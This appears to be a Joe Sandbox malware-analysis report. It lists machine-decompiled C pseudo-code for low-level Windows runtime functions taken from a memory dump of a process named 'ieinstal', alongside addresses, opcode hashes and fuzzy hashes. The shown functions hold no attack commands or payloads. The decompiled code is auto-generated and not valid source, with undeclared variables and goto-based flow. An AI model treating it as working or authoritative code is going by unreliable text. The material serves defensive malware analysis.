                        Function 1ED058EC, Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E1ED058EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x1edfd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1ece5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E1ED05943() != 0 &&  *0x1edf5320 > 5) {
					E1ED87B5E( &_v44, _t27);
					_t22 =  &_v28;
					E1ED87B5E( &_v28, _t28);
					_t11 = E1ED87B9C(0x1edf5320, 0x1ecebf15,  &_v28, _t22, 4,  &_v76);
				}
				return E1ED4B640(_t11, _t17, _v8 ^ _t29, 0x1ecebf15, _t27, _t28);
			}















                        0x1ed058fb
                        0x1ed058fe
                        0x1ed05906
                        0x1ed0590a
                        0x1ed0593c
                        0x1ed0593c
                        0x1ed0590c
                        0x1ed0590c
                        0x1ed05911
                        0x00000000
                        0x1ed05913
                        0x1ed05913
                        0x1ed05913
                        0x1ed05911
                        0x1ed0591d
                        0x1ed61035
                        0x1ed6103c
                        0x1ed6103f
                        0x1ed61056
                        0x1ed61056
                        0x1ed0593b

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 86943baa772241824597f65009f2c9d61e25715c5f20c16b759c030c97d82dd4
                        • Instruction ID: f6f7d6196dec6802b83cccaa4cbd37b79c9f60540f7113589f505bebb0cd9f38
                        • Opcode Fuzzy Hash: 86943baa772241824597f65009f2c9d61e25715c5f20c16b759c030c97d82dd4
                        • Instruction Fuzzy Hash: 66018435A005049BC724DA29DC11AAE77A9AF44620FDA0669DC06E7680DF30ED028764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDBFEC0, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E1EDBFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1edfd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1ED4FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E1ED27D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x1edbfec0
                        0x1edbfec0
                        0x1edbfecf
                        0x1edbfed9
                        0x1edbfede
                        0x1edbfee0
                        0x1edbfeeb
                        0x1edbfef3
                        0x1edbfef6
                        0x1edbfef9
                        0x1edbff04
                        0x1edbff16
                        0x1edbff06
                        0x1edbff0f
                        0x1edbff0f
                        0x1edbff21
                        0x1edbff22
                        0x1edbff24
                        0x1edbff29
                        0x1edbff3e

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e6016b4c8f034431daaa9148dfce7662fb55bb610e63469e0e92ef2e139ac102
                        • Instruction ID: 06327335f25a7b69e71e230136d47c6f60e6feddd347dfdc9b46fe328e2cee99
                        • Opcode Fuzzy Hash: e6016b4c8f034431daaa9148dfce7662fb55bb610e63469e0e92ef2e139ac102
                        • Instruction Fuzzy Hash: BD01D471A00248ABCB14CBA9D846FAEB7B8EF45700F404166F901AB280EA70EA41C7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDBFE3F, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E1EDBFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x1edfd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E1ED4FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E1ED27D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x1edbfe3f
                        0x1edbfe3f
                        0x1edbfe4e
                        0x1edbfe58
                        0x1edbfe5d
                        0x1edbfe5f
                        0x1edbfe6a
                        0x1edbfe72
                        0x1edbfe75
                        0x1edbfe78
                        0x1edbfe83
                        0x1edbfe95
                        0x1edbfe85
                        0x1edbfe8e
                        0x1edbfe8e
                        0x1edbfea0
                        0x1edbfea1
                        0x1edbfea3
                        0x1edbfea8
                        0x1edbfebd

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 747596ed8f0b8bb6b23e7344c24f62f1af0f48faaf21989f63f10138e754066e
                        • Instruction ID: 014e4b8fdc214014bff87f9926963ab76b9eee4f4dd2a7f916e543194fb98e4c
                        • Opcode Fuzzy Hash: 747596ed8f0b8bb6b23e7344c24f62f1af0f48faaf21989f63f10138e754066e
                        • Instruction Fuzzy Hash: FA01D471A00248ABCB14CFA9D846FAEB7B8EF40700F004566F901EB381DA70E941C7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD1074, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1EDD1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E1EDD165E(__ebx, 0x1edf8ae4, (__edx -  *0x1edf8b04 >> 0x14) + (__edx -  *0x1edf8b04 >> 0x14), __edi, __ecx, (__edx -  *0x1edf8b04 >> 0x14) + (__edx -  *0x1edf8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E1EDCAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E1ED27D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E1EDBFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                        0x1edd1074
                        0x1edd1080
                        0x1edd1082
                        0x1edd108a
                        0x1edd108f
                        0x1edd1093
                        0x1edd10ab
                        0x1edd10ab
                        0x1edd10c3
                        0x1edd10cf
                        0x1edd10e1
                        0x1edd10d1
                        0x1edd10da
                        0x1edd10da
                        0x1edd10e9
                        0x1edd10f5
                        0x1edd10f5
                        0x1edd10fe

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0177004138503fefab988b3406fa0776997ea5198baf19a21e0fe755c4d4cdb8
                        • Instruction ID: e73582419980ffe81d5ba88a12f31ca2a2b50be7053c5d1ef833b45cb2d4d3ad
                        • Opcode Fuzzy Hash: 0177004138503fefab988b3406fa0776997ea5198baf19a21e0fe755c4d4cdb8
                        • Instruction Fuzzy Hash: 750128765047859BC701DF75C940B2AB7E5FB84210F008B29F886836D0EF30E445CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1B02A, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED1B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E1ED27D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E1ED87016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                        0x1ed1b037
                        0x1ed1b039
                        0x1ed1b03b
                        0x1ed1b040
                        0x1ed6a60e
                        0x00000000
                        0x00000000
                        0x1ed6a61d
                        0x1ed1b04b
                        0x1ed1b04e
                        0x1ed6a627
                        0x1ed6a634
                        0x00000000
                        0x00000000
                        0x1ed6a641
                        0x1ed6a653
                        0x1ed6a643
                        0x1ed6a64c
                        0x1ed6a64c
                        0x1ed6a65b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed6a66c
                        0x1ed1b057
                        0x1ed1b057
                        0x1ed1b057
                        0x1ed1b046
                        0x1ed1b046
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: dbe1aea637047f2d189a48404163b9915014ca6b0440bfe90dc2c63a20caab1e
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 6301DF327009C0DFD322C75AD984F6677E9EB46740F0601A5F91ACBAA1D728DC40C321
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD8ED6, Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E1EDD8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x1edfd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E1ED27D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                        0x1edd8ed6
                        0x1edd8ee5
                        0x1edd8eed
                        0x1edd8ef0
                        0x1edd8efa
                        0x1edd8f03
                        0x1edd8f0c
                        0x1edd8f15
                        0x1edd8f24
                        0x1edd8f27
                        0x1edd8f31
                        0x1edd8f43
                        0x1edd8f33
                        0x1edd8f3c
                        0x1edd8f3c
                        0x1edd8f4e
                        0x1edd8f4f
                        0x1edd8f51
                        0x1edd8f56
                        0x1edd8f69

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a905c859b6879cf05c17145a10e99401b5a35de925374a4b72460a436b482fa8
                        • Instruction ID: c48a878d39453782f822e51ffc4d2b1033a20e14e77c076ebd28e26017060dda
                        • Opcode Fuzzy Hash: a905c859b6879cf05c17145a10e99401b5a35de925374a4b72460a436b482fa8
                        • Instruction Fuzzy Hash: 25111E74A002599FDB04DFA9C441BAEF7F4FF08300F1446AAE519EB782E7349941CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD8A62, Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E1EDD8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x1edfd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E1ED27D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                        0x1edd8a62
                        0x1edd8a71
                        0x1edd8a79
                        0x1edd8a82
                        0x1edd8a85
                        0x1edd8a89
                        0x1edd8a8c
                        0x1edd8a8f
                        0x1edd8a92
                        0x1edd8a95
                        0x1edd8a9f
                        0x1edd8ab1
                        0x1edd8aa1
                        0x1edd8aaa
                        0x1edd8aaa
                        0x1edd8abc
                        0x1edd8abd
                        0x1edd8abf
                        0x1edd8ac4
                        0x1edd8ada

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b868e531423b8c8238fbaa33b4bb6f94fd947bad4d181cb11f3d1dcd73d53d10
                        • Instruction ID: bed4a7ec900f408a5ba5aca0d9f0b821f756d5adb673408c84be53b6ec929a39
                        • Opcode Fuzzy Hash: b868e531423b8c8238fbaa33b4bb6f94fd947bad4d181cb11f3d1dcd73d53d10
                        • Instruction Fuzzy Hash: B3011A75A00259AFCB00DFA9D941AEEB7B8FF58310F50455AF905E7381DB34A9018BA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0DB60, Relevance: .0, Instructions: 43COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED0DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E1ED0DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E1ED0E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L1ED0E8B0(__ecx, _t14, 0xfff);
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                        0x1ed0db64
                        0x1ed0db66
                        0x1ed0db6b
                        0x1ed0dbaa
                        0x1ed0db71
                        0x1ed0db76
                        0x1ed0db7a
                        0x1ed0dba3
                        0x1ed0db7c
                        0x1ed0db87
                        0x1ed0db8b
                        0x1ed64fa1
                        0x1ed64fb3
                        0x1ed64fb8
                        0x1ed0db91
                        0x1ed0db96
                        0x1ed0db98
                        0x1ed0db98
                        0x1ed0db8b
                        0x1ed0db7a
                        0x1ed0db9d
                        0x1ed0dba2

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction ID: 0681183db2e9dc481a9eb0e8c27a8b6b68d4bb2cbf0d427560def0343ce125d7
                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                        • Instruction Fuzzy Hash: D9F0F6372016629BD7325A5A8880F5FB6B69FC1A60F1E0637F5049B384CBB0CC0287E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0B1E1, Relevance: .0, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED0B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E1ED27D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E1ED27D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E1ED87016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                        0x1ed0b1e8
                        0x1ed0b1ea
                        0x1ed0b1f3
                        0x1ed64a17
                        0x1ed0b1f9
                        0x1ed0b1f9
                        0x1ed0b1f9
                        0x1ed0b201
                        0x1ed64a21
                        0x1ed64a2e
                        0x00000000
                        0x00000000
                        0x1ed64a3b
                        0x1ed64a4d
                        0x1ed64a3d
                        0x1ed64a46
                        0x1ed64a46
                        0x1ed64a55
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed0b20a
                        0x1ed0b20a
                        0x1ed0b20a
                        0x1ed0b20a

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction ID: 56c0ff0801791d639638ab83e6915212ade903d13883b8b9bed292935aaa10b5
                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                        • Instruction Fuzzy Hash: 3F01F4326146C0EBD3228B6AC904F5A7B9AFF45758F0906A1F9558B6B2D779EC00C325
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED9FE87, Relevance: .0, Instructions: 38COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E1ED9FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x1edfd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E1ED27D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                        0x1ed9fe96
                        0x1ed9fe9e
                        0x1ed9fea1
                        0x1ed9fead
                        0x1ed9feb3
                        0x1ed9feb9
                        0x1ed9fec3
                        0x1ed9fed5
                        0x1ed9fec5
                        0x1ed9fece
                        0x1ed9fece
                        0x1ed9fee0
                        0x1ed9fee1
                        0x1ed9fee3
                        0x1ed9fee8
                        0x1ed9fefb

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a66e0c8cd577ac9694f03f0cc834d1c1250b673a4d7c233d6354640bde2a1071
                        • Instruction ID: 044d2aa71c7231ded63f643768e039cb95567ca8f72c4f7f4bcc013fd579cfb9
                        • Opcode Fuzzy Hash: a66e0c8cd577ac9694f03f0cc834d1c1250b673a4d7c233d6354640bde2a1071
                        • Instruction Fuzzy Hash: 05016274A00249EFCB14DFA8D542A6EB7F4EF04304F5046A9A515EB382DA35E902CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD8F6A, Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E1EDD8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1edfd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E1ED27D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                        0x1edd8f6a
                        0x1edd8f79
                        0x1edd8f81
                        0x1edd8f84
                        0x1edd8f8b
                        0x1edd8f91
                        0x1edd8f94
                        0x1edd8f9e
                        0x1edd8fb0
                        0x1edd8fa0
                        0x1edd8fa9
                        0x1edd8fa9
                        0x1edd8fbb
                        0x1edd8fbc
                        0x1edd8fbe
                        0x1edd8fc3
                        0x1edd8fd6

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56450ddf02605e7c2f4f6b8134d9e963bec2e8da05b834152da32695dba898b6
                        • Instruction ID: 354248ae7e0ec569685bf8c389cb4518ce9b95b0a3141a445b4890c1a3d01ec6
                        • Opcode Fuzzy Hash: 56450ddf02605e7c2f4f6b8134d9e963bec2e8da05b834152da32695dba898b6
                        • Instruction Fuzzy Hash: 70013C78A00249AFCB00DFB9D546AAEB7F4FF18300F504569B905EB381EB74EA00CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDC131B, Relevance: .0, Instructions: 36COMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E1EDC131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x1edfd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E1ED27D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                        0x1edc131b
                        0x1edc132a
                        0x1edc1330
                        0x1edc1336
                        0x1edc133e
                        0x1edc1341
                        0x1edc1344
                        0x1edc134f
                        0x1edc1361
                        0x1edc1351
                        0x1edc135a
                        0x1edc135a
                        0x1edc136c
                        0x1edc136d
                        0x1edc136f
                        0x1edc1374
                        0x1edc1387

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
